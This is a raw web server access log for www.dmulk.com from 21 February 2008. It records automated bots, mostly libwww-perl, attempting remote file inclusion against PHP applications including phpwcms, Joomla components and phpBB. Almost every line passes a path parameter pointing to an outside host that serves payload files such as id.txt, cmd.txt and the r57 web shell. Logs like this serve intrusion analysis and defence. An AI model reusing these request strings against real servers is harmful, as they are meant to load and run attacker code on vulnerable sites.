81.169.162.122 - - [21/Feb/2008:08:22:51 -0800] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.162.122 - - [21/Feb/2008:08:22:51 -0800] "GET /logs/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.111.157 - - [21/Feb/2008:08:23:00 -0800] "GET /logs/access_071231.log/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.111.157 - - [21/Feb/2008:08:23:00 -0800] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.111.157 - - [21/Feb/2008:08:23:01 -0800] "GET /logs/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.111.157 - - [21/Feb/2008:08:23:04 -0800] "GET /logs/access_071231.log/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.111.157 - - [21/Feb/2008:08:23:04 -0800] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.111.157 - - [21/Feb/2008:08:23:04 -0800] "GET /logs/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.36.215.74 - - [21/Feb/2008:08:23:07 -0800] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.215.74 - - [21/Feb/2008:08:23:07 -0800] "GET /logs/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.79.75.195 - - [21/Feb/2008:08:23:08 -0800] "GET /logs/access_080211.log/index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.22.162.60 - - [21/Feb/2008:08:23:09 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.toms-carwash.nl/mailing/oneadmin/upload/read.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
69.22.162.60 - - [21/Feb/2008:08:23:09 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.toms-carwash.nl/mailing/oneadmin/upload/read.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
69.16.211.62 - - [21/Feb/2008:08:23:12 -0800] "GET /logs/access_071231.log/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.95.146.25 - - [21/Feb/2008:08:23:18 -0800] "GET /logs/access_080108.log/templates/mangobery/footer.sample.php?Site_Path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.95.146.25 - - [21/Feb/2008:08:23:18 -0800] "GET /templates/mangobery/footer.sample.php?Site_Path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.95.146.25 - - [21/Feb/2008:08:23:19 -0800] "GET /logs/templates/mangobery/footer.sample.php?Site_Path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.134.61.183 - - [21/Feb/2008:08:23:22 -0800] "GET /logs/access_080130.log/sohoadmin/program/wizard/includes/login.php?_SESSION[docroot_path]=http://www.cartographia.org/ftp/files/source/TaN? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.91.198.51 - - [21/Feb/2008:08:23:26 -0800] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.223.25.25 - - [21/Feb/2008:08:23:26 -0800] "GET /logs/access_071231.log/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.223.25.25 - - [21/Feb/2008:08:23:26 -0800] "GET /logs/access_071231.log/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.223.25.25 - - [21/Feb/2008:08:23:27 -0800] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.223.25.25 - - [21/Feb/2008:08:23:27 -0800] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.223.25.25 - - [21/Feb/2008:08:23:27 -0800] "GET /logs/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.223.25.25 - - [21/Feb/2008:08:23:27 -0800] "GET /logs/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.89.74.40 - - [21/Feb/2008:08:23:33 -0800] "GET /logs/access_071231.log/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.89.74.40 - - [21/Feb/2008:08:23:33 -0800] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.89.74.40 - - [21/Feb/2008:08:23:33 -0800] "GET /logs/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.188.66.23 - - [21/Feb/2008:08:23:34 -0800] "GET //skin/zero_vote/error.php?dir=http://server1.weeu.net/cd/aj.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [21/Feb/2008:08:23:35 -0800] "GET /skin/zero_vote/error.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
217.64.195.226 - - [21/Feb/2008:08:23:53 -0800] "GET /logs/access_071231.log/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.64.195.226 - - [21/Feb/2008:08:23:53 -0800] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.64.195.226 - - [21/Feb/2008:08:23:54 -0800] "GET /logs/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.56.151.3 - - [21/Feb/2008:08:24:04 -0800] "GET //skin/zero_vote/error.php?dir=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.21.152.2 - - [21/Feb/2008:08:24:14 -0800] "GET /logs/access_071231.log/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [21/Feb/2008:08:24:14 -0800] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [21/Feb/2008:08:24:14 -0800] "GET /logs/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [21/Feb/2008:08:24:28 -0800] "GET /logs/access_071231.log/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.233.19.105 - - [21/Feb/2008:08:24:30 -0800] "GET //modules/xfsection/modify.php?dir_module=http://kaizo.hut2.ru/new/ro.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
211.233.19.105 - - [21/Feb/2008:08:24:30 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://kaizo.hut2.ru/new/ro.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
211.233.19.105 - - [21/Feb/2008:08:24:30 -0800] "GET //modules/xfsection/modify.php?dir_module=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
211.233.19.105 - - [21/Feb/2008:08:24:30 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
64.21.152.2 - - [21/Feb/2008:08:24:32 -0800] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [21/Feb/2008:08:24:32 -0800] "GET /logs/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.34.237 - - [21/Feb/2008:08:24:44 -0800] "GET /logs/access_071231.log/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.34.237 - - [21/Feb/2008:08:24:44 -0800] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.34.237 - - [21/Feb/2008:08:24:44 -0800] "GET /logs/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.107.54.16 - - [21/Feb/2008:08:24:58 -0800] "GET /logs/access_071231.log/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.107.54.16 - - [21/Feb/2008:08:24:58 -0800] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.107.54.16 - - [21/Feb/2008:08:24:58 -0800] "GET /logs/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.111.157 - - [21/Feb/2008:08:25:22 -0800] "GET /logs/access_080203.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.10.158.86 - - [21/Feb/2008:08:25:30 -0800] "GET /logs/access_080106.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.riothost.com/billing/downloads/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.158.35 - - [21/Feb/2008:08:26:11 -0800] "GET /?mosConfig_absolute_path=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.803" "www.dmulk.com"
201.54.5.228 - - [21/Feb/2008:08:26:13 -0800] "GET //update/update5.php?lang=http://www.socarretas.com/includes/languages/portugues/images/buttons/CVS/plekih/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.123.27.136 - - [21/Feb/2008:08:26:32 -0800] "GET /logs/access_071231.log/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.123.27.136 - - [21/Feb/2008:08:26:33 -0800] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.123.27.136 - - [21/Feb/2008:08:26:34 -0800] "GET /logs/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.123.27.136 - - [21/Feb/2008:08:26:47 -0800] "GET /logs/access_071231.log/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.123.27.136 - - [21/Feb/2008:08:26:48 -0800] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.123.27.136 - - [21/Feb/2008:08:26:49 -0800] "GET /logs/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.95.146.25 - - [21/Feb/2008:08:26:57 -0800] "GET /logs/access_080111.log/templates/mangobery/footer.sample.php?Site_Path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.200.216.110 - - [21/Feb/2008:08:27:04 -0800] "GET /lang=http://www.dynamiksolutions.com/web/templates/JavaBean/images/plekih/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.146.33.210 - - [21/Feb/2008:08:27:15 -0800] "GET /logs/index2.php?option=com_jcs§ion=&mosConfig_absolute_path=http://askastro.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
82.146.33.210 - - [21/Feb/2008:08:27:15 -0800] "GET /index2.php?option=com_jcs§ion=&mosConfig_absolute_path=http://askastro.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
77.92.145.50 - - [21/Feb/2008:08:27:40 -0800] "GET /logs/access_071231.log/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.127.72.15 - - [21/Feb/2008:08:27:40 -0800] "GET /logs/access_071231.log/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.92.145.50 - - [21/Feb/2008:08:27:41 -0800] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.92.145.50 - - [21/Feb/2008:08:27:42 -0800] "GET /logs/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.127.72.15 - - [21/Feb/2008:08:27:46 -0800] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.72.15 - - [21/Feb/2008:08:27:46 -0800] "GET /logs/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.203.223.115 - - [21/Feb/2008:08:28:10 -0800] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:08:28:14 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:08:28:15 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:08:28:15 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.121.111.157 - - [21/Feb/2008:08:28:21 -0800] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.107.54.16 - - [21/Feb/2008:08:28:21 -0800] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.234.222.47 - - [21/Feb/2008:08:29:07 -0800] "GET /logs/access.log/index.php?pagina=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.222.47 - - [21/Feb/2008:08:29:07 -0800] "GET /index.php?pagina=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.222.47 - - [21/Feb/2008:08:29:07 -0800] "GET /logs/index.php?pagina=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.223.25.25 - - [21/Feb/2008:08:29:37 -0800] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.223.25.25 - - [21/Feb/2008:08:29:48 -0800] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.64.195.226 - - [21/Feb/2008:08:30:12 -0800] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.188.66.23 - - [21/Feb/2008:08:31:02 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://server1.weeu.net/cd/aj.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.188.66.23 - - [21/Feb/2008:08:31:03 -0800] "GET //skin/zero_vote/error.php?dir=http://server1.weeu.net/cd/aj.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [21/Feb/2008:08:31:03 -0800] "GET /logs/access_080129.log/skin/zero_vote/error.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
193.188.66.23 - - [21/Feb/2008:08:31:04 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://server1.weeu.net/cd/aj.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [21/Feb/2008:08:31:05 -0800] "GET /logs/skin/zero_vote/error.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
64.21.152.2 - - [21/Feb/2008:08:31:30 -0800] "GET /logs/access_080203.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.216.110 - - [21/Feb/2008:08:31:35 -0800] "GET /logs/access_080201.log/lang=http://www.dynamiksolutions.com/web/templates/JavaBean/images/plekih/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.216.110 - - [21/Feb/2008:08:31:35 -0800] "GET /logs/lang=http://www.dynamiksolutions.com/web/templates/JavaBean/images/plekih/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.188.29.73 - - [21/Feb/2008:08:31:59 -0800] "GET //main.php?sayfa=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.139.243.11 - - [21/Feb/2008:08:32:10 -0800] "GET /logs/access_080211.log/joomla/index.php?option=com_restaurante&task=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.139.243.11 - - [21/Feb/2008:08:32:11 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.139.243.11 - - [21/Feb/2008:08:32:15 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.42.226 - - [21/Feb/2008:08:32:33 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://tuidang.net/skin1/main/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.42.226 - - [21/Feb/2008:08:32:33 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://tuidang.net/skin1/main/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.42.226 - - [21/Feb/2008:08:32:40 -0800] "GET /logs/access_080131.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://tuidang.net/skin1/main/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.188.66.23 - - [21/Feb/2008:08:33:15 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://server1.weeu.net/cd/aj.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [21/Feb/2008:08:33:20 -0800] "GET /logs/access_071228.log/skin/zero_vote/error.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
124.217.247.166 - - [21/Feb/2008:08:33:46 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.54.5.228 - - [21/Feb/2008:08:34:22 -0800] "GET /logs/access_080201.log//update/update5.php?lang=http://www.socarretas.com/includes/languages/portugues/images/buttons/CVS/plekih/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.54.5.228 - - [21/Feb/2008:08:34:23 -0800] "GET /logs//update/update5.php?lang=http://www.socarretas.com/includes/languages/portugues/images/buttons/CVS/plekih/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.76.150.198 - - [21/Feb/2008:08:34:28 -0800] "GET /logs/access_080203.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
